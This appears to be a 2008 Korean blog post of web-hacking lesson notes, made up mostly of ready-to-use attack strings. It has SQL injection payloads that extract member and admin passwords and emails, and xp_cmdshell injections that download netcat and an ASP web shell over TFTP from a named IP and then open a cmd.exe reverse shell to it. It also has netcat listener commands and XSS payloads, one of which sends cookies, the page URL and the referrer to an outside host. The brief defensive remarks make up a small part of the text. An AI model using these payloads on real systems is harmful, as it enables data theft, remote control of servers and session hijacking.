
web hacking appendix #1

by 사라진루팡 2008. 5. 21.

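SQL injection test strings (MS SQL Server / T-SQL). The convert(int, ...) forms depend on the server's type-conversion error text being returned to the page. Parameterized queries remove the injection point, and generic error pages remove the error channel.

' union select convert(int, m_id),1,1,1,1,1,1,1 from member_info--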

' union select convert(int,m_pwd+ ' yaho'),1,1,1,1,1,1,1 from member_info where m_id='adam'--

' union select convert(int,m_email+ ' yaho'),1,1,1,1,1,1,1 from member_info where m_id='adam'--

' union select convert(int,min(m_id)),1,1,1,1,1,1,1 from member_info where m_id>'adam'--

' union select convert(int,m_pwd+ ' yaho'),1,1,1,1,1,1,1 from member_info where m_id='admin'--

' union select convert(int,min(m_id)),1,1,1,1,1,1,1 from member_info where m_id like '%test%'--

' union all select m_id,m_pwd from member_info where 1=1--

--------------------------------------------------------------------------------------------------

command : client

nc.exe -lvp 80


command : server
nc.exe -e cmd.exe ip_address port

-------------------------------------------------------------------------------------------------

---------
-----------
--------- (lesson 2)
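## server

These strings only take effect when xp_cmdshell is enabled and the application's database login is allowed to run it (sysadmin rights or a configured proxy account). It is disabled by default since SQL Server 2005. On the defending side, the events to alert on are sqlservr.exe spawning cmd.exe, and outbound TFTP (UDP 69) or other outbound connections from the database host.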

';exec master..xp_cmdshell 'ping 152.99.68.181';--


';exec master..xp_cmdshell 'tftp 152.99.68.181 get nc_num14.exe c:\nc_num14.exe';--

';exec master..xp_cmdshell 'tftp 152.99.68.181 get cmd_new_num14.asp c:\inetpub\wwwroot\bad\cmd_new_num14.asp';--

';exec master..xp_cmdshell 'c:\nc_num14.exe -e cmd.exe 152.99.68.181 80';--

c:\inetpub\wwwroot\bad\download\data
-----------------------------------------------------------------

## client

windump(tool) -i 2 -n icmp

------------------------------------------------------------------
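XSS 취약점 (XSS vulnerabilities)

All examples below depend on user input being written into the page without HTML/attribute encoding. The javascript:/vbscript: image sources and the conditional comment are honoured only by legacy Internet Explorer versions; the link and event-handler forms are not browser-specific.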

ex1) using image
<img src="javascript:alert(document.cookie)">
-----------------------------------------------------------------
ex2) using link
<a href="javascript:alert(document.cookie);">XSS</a>
-------------------------------------------------------------
ex3) using mouseover
<div onmouseover="javascript:alert
(document.cookie);"><H1>XSS</div>
----------------------------------------------------------
ex4) using ASCII carriage returns
<IMG
SRC
=
"
j
a
v
a
s
c
r
i
p
t
:
a
l
e
r
t
(
'
X
S
S
'
)
"
>

----------
ex5) using VB script
<IMG SRC='vbscript:msgbox("XSS")'>
---------------------------------------
ex6) Downlevel-Hidden block
<!--[if gte IE 4]>
<SCRIPT>alert('XSS');</SCRIPT>
<![endif]-->
-------------------------------------------

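<XSS code>
This snippet sends the page URL, cookies and referrer to an external host. Session cookies marked HttpOnly do not appear in document.cookie, and a Content-Security-Policy without 'unsafe-inline' blocks javascript: URLs and inline event handlers.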
<img src="javascript:document.location='http://152.99.68.194/XSS/gc.m4n0f?u='+document.URL+'&c='+document.cookie+'&r='+document.referrer">test</img>
